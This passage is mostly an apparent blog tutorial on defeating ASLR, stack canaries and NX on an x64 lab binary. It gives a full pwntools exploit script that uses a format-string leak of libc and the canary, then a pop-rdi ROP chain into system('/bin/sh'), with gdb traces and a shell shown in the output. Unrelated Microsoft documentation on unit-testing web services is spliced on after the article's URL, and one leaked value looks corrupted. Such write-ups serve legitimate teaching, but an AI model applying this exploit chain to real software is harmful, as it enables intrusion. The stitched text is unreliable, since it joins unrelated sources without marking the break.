   0x0000000000400780 <+26>: lea    rax,[rbp-0x210]                   ; stack setup
   0x0000000000400787 <+33>: mov    rsi,rax
   0x000000000040078a <+36>: mov    edi,0x400928
   0x000000000040078f <+41>: mov    eax,0x0
   0x0000000000400794 <+46>: call   0x400650 <__isoc99_scanf@plt>     ; user input is read
   0x0000000000400799 <+51>: lea    rax,[rbp-0x210]
   0x00000000004007a0 <+58>: mov    rdi,rax                           ; user input is copied to rdi for printing
   0x00000000004007a3 <+61>: mov    eax,0x0
   0x00000000004007a8 <+66>: call   0x400620 <printf@plt>             ; buf contents are printed
   0x00000000004007ad <+71>: nop
   0x00000000004007ae <+72>: mov    rax,QWORD PTR [rbp-0x8]           ; stack canary check routine starts
   0x00000000004007b2 <+76>: xor    rax,QWORD PTR fs:0x28
   0x00000000004007bb <+85>: je     0x4007c2 <itIsJustASmallLeakSir+92>
   0x00000000004007bd <+87>: call   0x400600 <__stack_chk_fail@plt>   ; stack canary check failure
   0x00000000004007c2 <+92>: leave
   0x00000000004007c3 <+93>: ret                                      ; return to main
End of assembler dump.
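The frame layout can be read straight off this listing: buf lives at rbp-0x210 and the canary is stored at rbp-0x8. A quick sketch (plain Python 3, values copied from the disassembly above) shows how many bytes of input fit before we would start clobbering the canary:

```python
# Frame layout of itIsJustASmallLeakSir(), read from the disassembly:
BUF_OFFSET = 0x210      # lea rax,[rbp-0x210]  -> start of buf
CANARY_OFFSET = 0x8     # mov QWORD PTR [rbp-0x8],rax -> canary slot

# Bytes between the start of buf and the canary:
padding_to_canary = BUF_OFFSET - CANARY_OFFSET
print(padding_to_canary)    # 520: the 512-byte char buf plus 8 bytes of padding
```

The same arithmetic will give us the 1032-byte padding for the second function later on.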
Lastly we take a look at trustMeIAmAnEngineer():

gdb-peda$ disassemble trustMeIAmAnEngineer
Dump of assembler code for function trustMeIAmAnEngineer:
   0x00000000004007c4 <+0>:  push   rbp
   0x00000000004007c5 <+1>:  mov    rbp,rsp
   0x00000000004007c8 <+4>:  sub    rsp,0x410
   0x00000000004007cf <+11>: mov    rax,QWORD PTR fs:0x28             ; stack canary right here
   0x00000000004007d8 <+20>: mov    QWORD PTR [rbp-0x8],rax
   0x00000000004007dc <+24>: xor    eax,eax
   0x00000000004007de <+26>: lea    rax,[rbp-0x410]                   ; stack setup
   0x00000000004007e5 <+33>: mov    edx,0x800
   0x00000000004007ea <+38>: mov    rsi,rax
   0x00000000004007ed <+41>: mov    edi,0x0
   0x00000000004007f2 <+46>: mov    eax,0x0
   0x00000000004007f7 <+51>: call   0x400630 <read@plt>               ; user input is read
   0x00000000004007fc <+56>: nop
   0x00000000004007fd <+57>: mov    rax,QWORD PTR [rbp-0x8]           ; stack canary check routine starts
   0x0000000000400801 <+61>: xor    rax,QWORD PTR fs:0x28
   0x000000000040080a <+70>: je     0x400811 <trustMeIAmAnEngineer+77>
   0x000000000040080c <+72>: call   0x400600 <__stack_chk_fail@plt>   ; stack canary check failure
   0x0000000000400811 <+77>: leave
   0x0000000000400812 <+78>: ret                                      ; return to main
End of assembler dump.
gdb-peda$

As you can see, compared to last time, nothing much changed except that it is an x64 binary this time around. All other parts should be familiar by now!

64-bit exploitation crash course

Let's do a really short introduction to x64 exploitation. My last two articles only covered x86 PoCs, so let's step up the game a bit. Not too much will change, but let's get everyone roughly on the same level before continuing.

Registers

In x86 we have 8 general purpose registers: eax, ebx, ecx, edx, ebp, esp, esi, edi. On x64 these got extended to 64 bits (the prefix changed from 'e' to 'r') and 8 additional registers r8, r9, r10, r11, r12, r13, r14, r15 were added.

Function arguments

According to the Application Binary Interface (ABI), the first 6 integer or pointer arguments to a function are passed in registers.
The first argument is placed in rdi, the second in rsi, the third in rdx, and then rcx, r8 and r9. Only the 7th argument and onwards are passed on the stack! r10 is used as a static chain pointer in the case of nested functions.

Extra: Return Oriented Programming (ROP) primer

The basic idea behind return oriented programming is that you chain together small 'gadgets'. A gadget is a short instruction sequence ending with some kind of control flow manipulation that invokes the next gadget in the chain — most of the time a simple ret. Once we execute a ret, the address of the next gadget is popped off the stack and control flow jumps to that address. In particular, ROP is useful for circumventing Address Space Layout Randomization and DEP to gain e.g. arbitrary code execution of some form.

Note: If you want to get even more familiar with ROP, check the challenge section of the forum. Multiple writeups of different complexity are waiting to be found.

We can find gadgets in numerous ways. The easiest way might be to use one of the already existing tools like ropper. For our binary above, the shortened output looks like:

$ ropper2 --file ./vuln_x64
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%

Gadgets
=======
0x00000000004006c2: adc byte ptr [rax], ah; jmp rax;
0x000000000040090f: add bl, dh; ret;
0x0000000000400754: add byte ptr [rax - 0x7b], cl; sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax;
0x000000000040090d: add byte ptr [rax], al; add bl, dh; ret;
0x0000000000400752: add byte ptr [rax], al; add byte ptr [rax - 0x7b], cl; sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax;
0x000000000040090b: add byte ptr [rax], al; add byte ptr [rax], al; add bl, dh; ret;
[...]
0x0000000000400912: add byte ptr [rax], al; sub rsp, 8; add rsp, 8; ret;
0x000000000040088e: add byte ptr [rax], al; leave; ret;
0x000000000040088f: add cl, cl; ret;
0x0000000000400734: add eax, 0x200936; add ebx, esi; ret;
0x000000000040080b: add eax, 0xfffdefe8; dec ecx; ret;
[...]
0x00000000004005bd: add rsp, 8; ret;
0x0000000000400737: and byte ptr [rax], al; add ebx, esi; ret;
0x0000000000400886: call 0x5f0; mov eax, 0; leave; ret;
0x00000000004007bd: call 0x600; leave; ret;
[...]
0x00000000004006d0: pop rbp; ret;
0x0000000000400903: pop rdi; ret;
0x0000000000400901: pop rsi; pop r15; ret;
0x00000000004008fd: pop rsp; pop r13; pop r14; pop r15; ret;
0x000000000040075a: push rbp; mov rbp, rsp; call rax;
0x0000000000400757: sal byte ptr [rcx + rsi*8 + 0x55], 0x48; mov ebp, esp; call rax;
0x0000000000400915: sub esp, 8; add rsp, 8; ret;
0x0000000000400914: sub rsp, 8; add rsp, 8; ret;
0x00000000004006ca: test byte ptr [rax], al; add byte ptr [rax], al; add byte ptr [rax], al; pop rbp; ret;
0x0000000000400759: int1; push rbp; mov rbp, rsp; call rax;
0x00000000004007c2: leave; ret;
0x00000000004005c1: ret;

63 gadgets found

You can see that over 60 unique gadgets are already present in our small binary. Now all that's left is chaining the right ones together ;). In our case this won't be too complicated, but depending on the binary you want to exploit, this task can be a real hassle!
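Before diving into the full exploit script, here is a minimal sketch (plain Python 3 using only the standard struct module, mirroring pwntools' p64()) of what the final ROP payload layout will look like. The gadget address and frame offsets are taken from the listings above; the canary, system and /bin/sh values are placeholders that are only known at runtime:

```python
import struct

def p64(value):
    # pack a value as a little-endian 64-bit quadword, like pwntools' p64()
    return struct.pack('<Q', value)

POP_RDI_RET = 0x400903          # pop rdi; ret; gadget from the ropper output

# trustMeIAmAnEngineer(): buf at rbp-0x410, canary at rbp-0x8
padding = b'A' * (0x410 - 0x8)  # 1032 bytes of junk up to the canary

canary  = 0x5b9cf8225c7bc900    # placeholder: leaked at runtime
system  = 0x7f6c34c9a390        # placeholder: resolved from the libc leak
bin_sh  = 0x7f6c34de1d57        # placeholder: '/bin/sh' string inside libc

payload  = padding
payload += p64(canary)          # keep the stack canary check happy
payload += b'B' * 8             # saved RBP, value irrelevant
payload += p64(POP_RDI_RET)     # saved RIP -> first gadget
payload += p64(bin_sh)          # popped into rdi by the gadget
payload += p64(system)          # the gadget's ret lands in system("/bin/sh")

print(len(payload))             # 1032 + 5*8 = 1072 bytes
```

This is exactly the shape create_payload() in the exploit below produces.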
The exploit

#!/usr/bin/env python2
import argparse
from pwn import *
from pwnlib import *

context.binary = ELF('./binaries/vuln_x64')
context.log_level = 'DEBUG'
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

pop_rdi_ret_gadget = 0x0000000000400903


def prepend_0x_to_hex_value(value):
    full_hex = '0x' + value
    return full_hex


def cast_hex_to_int(hex_value):
    return int(hex_value, 16)


def get_libc_base_address(leak_dump):
    random_libc_address = leak_dump.split('.')[1]
    random_libc_address_with_0x_prepended = prepend_0x_to_hex_value(random_libc_address)
    print '[*] leaked position within libc is at %s' % random_libc_address_with_0x_prepended
    libc_to_int = cast_hex_to_int(random_libc_address_with_0x_prepended)
    libc_base = hex(libc_to_int - 0x3c6790)  # offset found through debugging
    print "[=>] That puts the libc base address at %s" % libc_base
    return cast_hex_to_int(libc_base)


def get_canary_value(leak_dump):
    canary_address = leak_dump.split('.')[70]
    full_canary_value = prepend_0x_to_hex_value(canary_address)
    print '[+] Canary value is: %s' % full_canary_value
    canary_to_int = cast_hex_to_int(full_canary_value)
    return canary_to_int


def leak_all_the_things():
    payload = ''
    payload += '%llx.' * 71
    return payload


def get_system_in_glibc(libc_base):
    print("[+] system@libc has offset: {}".format(hex(libc.symbols['system'])))
    system_call = libc_base + libc.symbols['system']
    print("[+] This puts the system call to {}".format(hex(system_call)))
    return system_call


def get_bin_sh_in_glibc(libc_base):
    bin_sh = int(libc.search("/bin/sh").next())
    print("[+] /bin/sh located @ offset {}".format(hex(bin_sh)))
    shell_addr = libc_base + bin_sh
    print("[+] This puts the shell to {}".format(hex(shell_addr)))
    return shell_addr


def get_cyclic_pattern(length):
    pattern = cyclic(length)
    return pattern


def create_payload(canary, system, shell):
    junk_pattern = get_cyclic_pattern(1032)
    payload = ''
    payload += junk_pattern              # junk pattern to fill buffer
    payload += p64(canary)               # place canary at the right position
    payload += 'AAAAAAAA'                # overwrite RBP with some junk
    payload += p64(pop_rdi_ret_gadget)   # overwrite RIP with the address of our ROP gadget
    payload += p64(shell)                # pointer to /bin/sh in libc
    payload += p64(system)               # system@libc
    return payload


def main():
    parser = argparse.ArgumentParser(description='pwnage')
    parser.add_argument('--dbg', '-d', action='store_true')
    args = parser.parse_args()

    exe = './binaries/vuln_x64'
    format_string_leak = leak_all_the_things()

    if args.dbg:
        r = gdb.debug([exe], gdbscript="""
        b *trustMeIAmAnEngineer+56
        continue
        """)
    else:
        r = process([exe])

    r.recvuntil("$> ")
    r.sendline(format_string_leak)
    leak = r.recvline()
    print '[+] Format string leak:\n [%s]\n' % leak.rsplit("\n")[0]

    libc_base = get_libc_base_address(leak)
    system_call = get_system_in_glibc(libc_base)
    bin_sh = get_bin_sh_in_glibc(libc_base)
    canary = get_canary_value(leak)
    payload = create_payload(canary, system_call, bin_sh)

    r.recvuntil("$> ")
    r.sendline(payload)
    r.interactive()


if __name__ == '__main__':
    main()
    sys.exit(0)

The exploit itself should be quite self-explanatory, but let's quickly walk through it together. First of all, when launching the binary we wait for it to prompt us for the first input. When this happens we provide a bunch of format specifiers (%llx.) to get a leak from memory.

Recall: the %llx format specifier prints a long long-sized integer as hex.

The leak will look something like this:

1.7f6c3501b790.a.0.7f6c35219c35019b78.7f6c3501b780.7f6c35244ca0.7f6c3501b780.1.ff000000000000.7f6c3501a620.0.7f6c3501a620.7f6c3501a6a4.7f6c3501a6a3.7ffdc2a905a0.7f6c34cd09e6.7f6c3501a620.0.0.7f6c34ccd439.7f6c3501a620.7f6c34cc4d94.0.5b9cf8225c7bc900.

It turned out that the 2nd leaked value is a random address within libc. With that address we were able to calculate the base address of libc by looking up the libc mapping of the current process from within gdb.
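The leak handling in get_libc_base_address() and get_canary_value() boils down to splitting the dump on '.'. Here is a self-contained sketch (plain Python 3; the leak string is a hypothetical shortened sample built from the values above, padded with zero fields so that the canary sits at index 70 as in the real 71-field dump):

```python
# Field 1 is the libc leak; index 70 is the canary (the last %llx printed).
fields = ['1', '7f6c3501b790', 'a', '0'] + ['0'] * 66 + ['5b9cf8225c7bc900']
leak = '.'.join(fields) + '.'

values = leak.split('.')
libc_leak = int(values[1], 16)   # random address inside libc
canary    = int(values[70], 16)  # stack canary

print(hex(libc_leak))   # 0x7f6c3501b790
print(hex(canary))      # 0x5b9cf8225c7bc900
# glibc canaries always have a 0x00 least significant byte:
assert canary & 0xff == 0
```

That null byte is also why the canary is so easy to spot in the raw dump.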
gdb-peda$ vmmap
Start              End                Perm  Name
0x00400000         0x00401000         r-xp  /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64
0x00600000         0x00601000         r--p  /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64
0x00601000         0x00602000         rw-p  /home/lab/Git/RE_binaries/ASLR/binaries/vuln_x64
0x01d12000         0x01d33000         rw-p  [heap]
0x00007f6c34c55000 0x00007f6c34e15000 r-xp  /lib/x86_64-linux-gnu/libc-2.23.so
0x00007f6c34e15000 0x00007f6c35015000 ---p  /lib/x86_64-linux-gnu/libc-2.23.so
0x00007f6c35015000 0x00007f6c35019000 r--p  /lib/x86_64-linux-gnu/libc-2.23.so
0x00007f6c35019000 0x00007f6c3501b000 rw-p  /lib/x86_64-linux-gnu/libc-2.23.so
0x00007f6c3501b000 0x00007f6c3501f000 rw-p  mapped
0x00007f6c3501f000 0x00007f6c35045000 r-xp  /lib/x86_64-linux-gnu/ld-2.23.so
0x00007f6c35218000 0x00007f6c3521b000 rw-p  mapped
0x00007f6c35244000 0x00007f6c35245000 r--p  /lib/x86_64-linux-gnu/ld-2.23.so
0x00007f6c35245000 0x00007f6c35246000 rw-p  /lib/x86_64-linux-gnu/ld-2.23.so
0x00007f6c35246000 0x00007f6c35247000 rw-p  mapped
0x00007ffdc2a72000 0x00007ffdc2a93000 rw-p  [stack]
0x00007ffdc2a98000 0x00007ffdc2a9b000 r--p  [vvar]
0x00007ffdc2a9b000 0x00007ffdc2a9d000 r-xp  [vdso]
0xffffffffff600000 0xffffffffff601000 r-xp  [vsyscall]
gdb-peda$

We can see that the randomized base address of the used libc is 0x7f6c34c55000. If we subtract this value from the random libc leak, we get the offset of the leaked address from the libc base. We can use exactly this offset in any future execution to find our libc base address. This works because, while the process memory (and with it libc's position) is fully randomized, offsets within a library never change — everything always has the same distance from the base address! Hence calculating the randomized libc base address from a static offset works 100% of the time. All of this base calculation happens in get_libc_base_address(leak_dump).
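The arithmetic behind get_libc_base_address() can be checked directly with the numbers from the vmmap dump: subtracting the static offset from the leaked address must land exactly on the start of libc's mapping, and a correct base is always page-aligned:

```python
LIBC_LEAK = 0x7f6c3501b790      # 2nd value of the format string leak
LIBC_BASE = 0x7f6c34c55000      # start of libc's r-xp mapping in vmmap

STATIC_OFFSET = LIBC_LEAK - LIBC_BASE
print(hex(STATIC_OFFSET))       # 0x3c6790 -- the constant used in the exploit

# In any later run: base = new_leak - STATIC_OFFSET. Sanity check: mappings
# are page-aligned, so a correct libc base always ends in 0x000.
assert (LIBC_LEAK - STATIC_OFFSET) & 0xfff == 0
```

The alignment check is a cheap way to catch a wrong offset before firing the full payload.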
Having access to libc is like opening Pandora's box — so many useful functions in there. I chose to go the ret2system way and calculated the address of system() and a pointer to /bin/sh from the libc base address. All of that happens in get_system_in_glibc(libc_base) and get_bin_sh_in_glibc(libc_base).

A really valuable piece of information happened to be at the 71st position in the leaked data: our stack canary, which we need to successfully leverage the buffer overflow! It is especially easy to spot since it's a 64-bit value whose least significant byte is always 0x00. I just extracted the value from the dump in get_canary_value(leak_dump).

All that is left now is putting it all together, which happens in create_payload(canary, system, shell). I'm filling the buffer until right before it overflows into the stack canary. Then I append the canary value and continue to overwrite the saved RBP with some junk, since it's irrelevant what we put there for the PoC. Afterwards our little friend, the pop rdi; ret gadget, is put onto the stack. Lastly a pointer to our wanted shell string and the address of system() are added.

Let's visualize this in gdb. Right when we hit the ret instruction in trustMeIAmAnEngineer after our buffer overflow happened, our registers and stack look like this:

[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7f6c34d4c260 (<__read_nocancel+7>: cmp rax,0xfffffffffffff001)
RDX: 0x800
RSI: 0x7ffdc2a90090 ("azaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab"...)
RDI: 0x0
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7ffdc2a904a8 --> 0x400903 (<__libc_csu_init+99>: pop rdi)
RIP: 0x400812 (<trustMeIAmAnEngineer+78>: ret)
R8 : 0x7f6c35219700 (0x00007f6c35219700)
R9 : 0x3
R10: 0x37b
R11: 0x246
R12: 0x400670 (<_start>: xor ebp,ebp)
R13: 0x7ffdc2a905a0 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40080a <trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>
   0x40080c <trustMeIAmAnEngineer+72>: call 0x400600 <__stack_chk_fail@plt>
   0x400811 <trustMeIAmAnEngineer+77>: leave
=> 0x400812 <trustMeIAmAnEngineer+78>: ret
   0x400813 <main>: push rbp
   0x400814 <main+1>: mov rbp,rsp
   0x400817 <main+4>: sub rsp,0x10
   0x40081b <main+8>: mov DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7ffdc2a904a8 --> 0x400903 (<__libc_csu_init+99>: pop rdi)
0008| 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi)
0024| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>)
0032| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax)
0040| 0x7ffdc2a904d0 --> 0x0
0048| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64")
0056| 0x7ffdc2a904e0 --> 0x135244ca0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$

We can see that our entire final payload is located on the stack. When executing the ret instruction, the next value on the stack is popped into RIP — our pop rdi; ret gadget. The stack pointer RSP is adjusted accordingly to point to the next value on the stack, which is the pointer to our shell string /bin/sh.
[----------------------------------registers-----------------------------------]
[...]
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh')
RIP: 0x400903 (<__libc_csu_init+99>: pop rdi)
[...]
[-------------------------------------code-------------------------------------]
=> 0x400903 <__libc_csu_init+99>: pop rdi
   0x400904 <__libc_csu_init+100>: ret
   0x400905: nop
   0x400906: nop WORD PTR cs:[rax+rax*1+0x0]
[------------------------------------stack-------------------------------------]
0000| 0x7ffdc2a904b0 --> 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi)
0016| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>)
0024| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax)
0032| 0x7ffdc2a904d0 --> 0x0
0040| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64")
0048| 0x7ffdc2a904e0 --> 0x135244ca0
0056| 0x7ffdc2a904e8 --> 0x400813 (<main>: push rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$

Let's execute pop rdi; ret now, which will pop the current top of the stack — our shell pointer — into RDI. Since our chosen gadget ends with a ret statement, execution continues with the next value RSP points to, which is our system() call!

[----------------------------------registers-----------------------------------]
[...]
RDI: 0x7f6c34de1d57 --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi)
RIP: 0x400904 (<__libc_csu_init+100>: ret)
[...]
[-------------------------------------code-------------------------------------]
   0x4008fe <__libc_csu_init+94>: pop r13
   0x400900 <__libc_csu_init+96>: pop r14
   0x400902 <__libc_csu_init+98>: pop r15
=> 0x400904 <__libc_csu_init+100>: ret
   0x400905: nop
   0x400906: nop WORD PTR cs:[rax+rax*1+0x0]
   0x400910 <__libc_csu_fini>: repz ret
   0x400912: add BYTE PTR [rax],al
[------------------------------------stack-------------------------------------]
0000| 0x7ffdc2a904b8 --> 0x7f6c34c9a390 (<__libc_system>: test rdi,rdi)
0008| 0x7ffdc2a904c0 --> 0x40080a (<trustMeIAmAnEngineer+70>: je 0x400811 <trustMeIAmAnEngineer+77>)
0016| 0x7ffdc2a904c8 --> 0x7f6c34c75830 (<__libc_start_main+240>: mov edi,eax)
0024| 0x7ffdc2a904d0 --> 0x0
0032| 0x7ffdc2a904d8 --> 0x7ffdc2a905a8 --> 0x7ffdc2a92109 ("./binaries/vuln_x64")
0040| 0x7ffdc2a904e0 --> 0x135244ca0
0048| 0x7ffdc2a904e8 --> 0x400813 (<main>: push rbp)
0056| 0x7ffdc2a904f0 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
gdb-peda$

Remember what I introduced in the x64 exploitation crash course? The first function argument on x64 needs to be placed in RDI — and we managed to place our pointer to /bin/sh there. And that's all, actually! system() is called with the contents of RDI as its function argument, which gets us a shell.

Alternative PoC: vmmap reveals that our stack ends at 0x00007ffdc2a93000 and the 62nd value in the leak is within the stack frame (0x7ffdc2a905a0). We could leverage this to call mprotect() on the stack to make it executable again too!
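To make the control flow above concrete, here is a tiny, purely illustrative simulation (plain Python 3) of the three steps — ret, pop rdi; ret, and the landing in system() — operating on the payload's tail as a stack of quadwords. The addresses are the ones from the gdb dumps:

```python
# Toy model of the stack right at the final `ret` of trustMeIAmAnEngineer.
POP_RDI_RET = 0x400903          # pop rdi; ret
BIN_SH      = 0x7f6c34de1d57    # pointer to "/bin/sh" in libc
SYSTEM      = 0x7f6c34c9a390    # __libc_system

stack = [POP_RDI_RET, BIN_SH, SYSTEM]   # top of stack first
rdi = None

# step 1: `ret` pops the gadget address into rip
rip = stack.pop(0)
assert rip == POP_RDI_RET

# step 2: `pop rdi` pops the next quadword into rdi...
rdi = stack.pop(0)
# ...and the gadget's trailing `ret` pops the following address into rip
rip = stack.pop(0)

assert rdi == BIN_SH    # first argument register holds the "/bin/sh" pointer
assert rip == SYSTEM    # execution continues inside system()
print('system("/bin/sh") reached')
```

Of course the real CPU does this with RSP arithmetic rather than list pops, but the ordering of the quadwords is exactly what the payload layout encodes.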
PoC

$ cat /proc/sys/kernel/randomize_va_space
2
$ python defeat_ASLR_x64.py
[*] '/home/lab/Git/RE_binaries/0x00sec_WIP/ASLR/binaries/vuln_x64_3'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[*] '/lib/x86_64-linux-gnu/libc-2.23.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './binaries/vuln_x64_3': pid 18749
[+] Format string leak:
 [1.7f6e0caee790.a.0.7f6e0ccebe0caecb78.7f6e0caee780.7f6e0cd17ca0.7f6e0caee780.1.0.7f6e0caed620.0.7f6e0caed620.7f6e0caed6a4.7f6e0caed6a3.7ffdd976dcf0.7f6e0c7a39e6.7f6e0caed620.0.0.7f6e0c7a0439.7f6e0caed620.7f6e0c797d94.0.87ec97b667e1eb00.]
[*] leaked position within libc is at 0x7f6e0caee790
[=>] That puts the libc base address at 0x7f6e0c728000
[+] system@libc has offset: 0x45390
[+] This puts the system call to 0x7f6e0c76d390
[+] /bin/sh located @ offset 0x18cd57
[+] This puts the shell to 0x7f6e0c8b4d57
[+] Canary value is: 0x87ec97b667e1eb00
[*] Switching to interactive mode
$ whoami
lab
$

Conclusion

Address space layout randomization and position independent executables fully randomize the address space of any executed binary and were implemented not just as another "final defense against attack X" mechanism, but to make exploitation in general a lot more difficult. The introduced randomness breaks all of the static exploit approaches taken before and made the game a lot harder. But the design flaws that were found, especially on 32-bit operating systems, reduce the viability of this technique by quite a lot. Luckily the era of 32-bit OSes is coming to an end nowadays, at least in the desktop and server area — IoT is another topic :) ... The PoC shown here introduced x64 exploitation and demonstrated what a bypass of an ASLR, DEP and stack canary hardened binary can look like.
The vulnerabilities used were more than obvious, and real-life exploitation is (most often) a lot more difficult, but I think the general idea was conveyed in an easy to digest manner. At best you have an awesome memory leak which gets you some libc address and maybe even the canary. If RELRO is not fully enabled and we have a viable format string vulnerability at hand, we can try to overwrite entries within the GOT. PIE makes building ROP chains quite a bit more complex and was left out for the sake of understandability.

Last but not least, I hope you enjoyed the read, and as always I would appreciate your feedback to make future articles better!

Sources / References

- Differences Between ASLR on Windows and Linux
- Position Independent Executables (PIE)
- Breaking Kernel Address Space Layout Randomization with Intel TSX
- ASLR support for Linux
- kernel ASLR (kASLR) support for Linux
- Exploiting Linux and PaX ASLR's weaknesses on 32- and 64-bit systems
- Address Space Layout Randomization by PaX
- Offset2lib: bypassing full ASLR on 64bit Linux
- Surgically returning to randomized lib(c)
- Linux Kernel on Git
- Derandomizing Kernel Address Space Layout for Memory Introspection and Forensics
- Practical Timing Side Channel Attacks against Kernel Space ASLR
- Just-In-Time Code Reuse: On the Effectiveness of Fine-Grained Address Space Layout Randomization
- On the Effectiveness of Address-Space Randomization
- New ASLR bypass presented in March 2018
https://0x00rick.com/research/2018/04/09/intro_adress_space_layout_rand.html
Testing Web Services

You can test Web services by calling Web methods from unit tests. Testing Web services is much like testing other code by using unit tests in that you can use Assert statements, and the tests produce the same range of results. However, the Microsoft.VisualStudio.TestTools.UnitTesting.Web namespace of Team Edition for Testers provides attributes and methods specifically for testing Web services; they are described in Testing a Web Service Locally. The following list describes two ways to test Web services with unit tests:

The Web service runs on an active Web server. There are no special requirements for testing a Web service that runs on a local or a remote Web server, such as IIS. To do this, add a Web reference and then call the Web methods of the Web service from your unit tests just as you would call the methods of a program that is not a Web service. For information about how to add a Web reference, see Add Web Reference Dialog Box. For information about how to create unit tests, see How to: Generate a Unit Test and How to: Author a Unit Test. For information about how to use a Web test to test a Web service, see How to: Create a Web Service Test.

The Web service is not hosted in an active Web server. As described in Testing a Web Service Locally, you can test a Web service that runs on your local computer and not in a Web server, such as IIS. To do this, you use an attribute provided by the Team System testing tools to start ASP.NET Development Server. This creates a temporary server at localhost that hosts the Web service that you are testing. For more information about ASP.NET Development Server, see Web Servers in Visual Web Developer.

Testing a Web Service Locally

This is the process for testing a Web service that runs on your local computer but not in IIS:

Create the Web service on the local file system. For more information, see Walkthrough: Creating an XML Web Service Using Visual Basic or Visual C#.
Generate unit tests against the Web service in the standard way for generating unit tests. For more information, see How to: Generate a Unit Test.

Add the AspNetDevelopmentServerAttribute attribute to the unit test. The arguments for this attribute class point to the site of the Web service and name the server. For more information, see Ensuring Access to ASP.NET Development Server.

Within the unit test, add a call to the TryUrlRedirection method to point the Web service object to the correct server. Verify that it returns true, and use an Assert statement to fail the test if the redirection fails. For more information, see Using the TryUrlRedirection Method.

Call the Web service or exercise it in any other way that you feel is necessary to test it thoroughly. For an example of this, see Example Web Service Test Method.

Ensuring Access to ASP.NET Development Server

If the site of the Web service is on your local file system, it uses ASP.NET Development Server and it is not an IIS site. In this case, the process of generating unit tests starts an ASP.NET Development Server for the Web service and adds a Web reference to the test project. The ASP.NET Development Server is temporary, and the Web reference would fail after the server is stopped. Team System testing tools solve this problem by providing the AspNetDevelopmentServer attribute. This attribute class has two constructors:

AspNetDevelopmentServerAttribute(string name, string pathToWebApp)
AspNetDevelopmentServerAttribute(string name, string pathToWebApp, string webAppRoot)

The following parameters are used with this attribute:

name is a user-defined name that is associated with the server.
pathToWebApp is the path on disk to the Web site you are testing.
webAppRoot is the virtual path at which the site appears on the server. For example, if webAppRoot is set to /WebSite1, the path to the site is http://localhost:<port>/WebSite1. For the first constructor, the default is http://localhost:<port>/.
Note: The parameters pathToWebApp and webAppRoot are used the same way with AspNetDevelopmentServerAttribute as they are for the AspNetDevelopmentServerHost attribute, which is used for ASP.NET unit tests.

When you mark a test with the attribute AspNetDevelopmentServerAttribute, an ASP.NET Development Server is started whenever the test is run. An entry that contains the URL of the site being tested is added to TestContext.Properties of the test class. The key for this entry is AspNetDevelopmentServer.<name>, where <name> is the value held by the name argument of the attribute. This mechanism makes sure that the Web service is always available at an ASP.NET Development Server when the test is run and that the URL is known at run time.

To test a Web service this way, you could generate unit tests, or you could write a unit test by hand and mark it with this attribute. Hand authoring requires that you have a Web reference in place so that you can reference the type of the Web service in the code of your unit test. Before you add the Web reference, you must start an ASP.NET Development Server by right-clicking the Web service project and choosing View in Browser.

Using the TryUrlRedirection Method

After you have a Web reference, you can create an instance of the Web service object in your test code, but this might fail at run time because the reference points to the URL of an instance of ASP.NET Development Server that may no longer be running. To solve this problem, use the TryUrlRedirection method to modify the Web service object so that it points to the ASP.NET Development Server that was started specifically for the running unit test. TryUrlRedirection is a static method of the WebServiceHelper class that returns a Boolean that indicates whether the redirection succeeded.
bool TryUrlRedirection(System.Web.Services.Protocols.WebClientProtocol client, TestContext context, string identifier)

TryUrlRedirection takes three arguments:

client is the Web service object to be redirected.
context is the TestContext object for the class.
identifier is the user-defined name for the server to which the Web service object is being redirected.

After calling this method, if it succeeds, you can then call Web methods on the Web service object. In this way, the Web service is accessed through the ASP.NET Development Server that was started when you started the unit test. You can use multiple AspNetDevelopmentServer attributes on a single unit test to start multiple servers, as long as you give them different names.

